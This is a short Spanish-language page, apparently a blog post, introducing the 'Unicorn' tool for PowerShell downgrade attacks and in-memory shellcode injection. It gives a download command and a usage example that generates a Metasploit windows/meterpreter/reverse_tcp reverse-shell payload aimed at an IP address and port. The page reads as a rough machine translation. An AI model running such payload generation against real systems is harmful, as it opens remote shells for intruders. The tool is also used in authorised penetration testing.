Unicorn



  •  Unicorn es una herramienta simple para usar un ataque de degradación de PowerShell e inyectar shellcode directamente en la memoria. Basado en los ataques de PowerShell de Matthew Graeber y la técnica de derivación de PowerShell presentada por David Kennedy (TrustedSec) y Josh Kelly en Defcon 18.El uso es simple, simplemente ejecute Magic Unicorn (asegúrese de que Metasploit esté instalado y en el camino correcto) y el unicornio mágico generará automáticamente un comando de PowerShell que necesita simplemente cortar y pegar el código de PowerShell en una ventana de línea de comando oa través de una entrega de carga. sistema.Registro de cambiosversión 2.9~~~~~~~~~~~~~~~~* añadido un sys.exit () en la cantidad de longitud* Se agregó un nuevo código dde exec a través del unicornio de sensepost* corrigió algunas palabras en el menú de ayuda* limpieza general del código* redujo la línea de comandos un poco más con la reducción del separador y la longitud del tamaño del nombre variable

     
    Descargar

        
    git clone https://github.com/trustedsec/unicorn.git
        
    python unicorn.py

     
    Uso

        
    python unicorn.py payload reverse_ipaddr puerto
        
    Ejemplo:
        
    python unicorn.py windows / meterpreter / reverse_tcp 192.168.1.5 1337

Comentarios

Entradas populares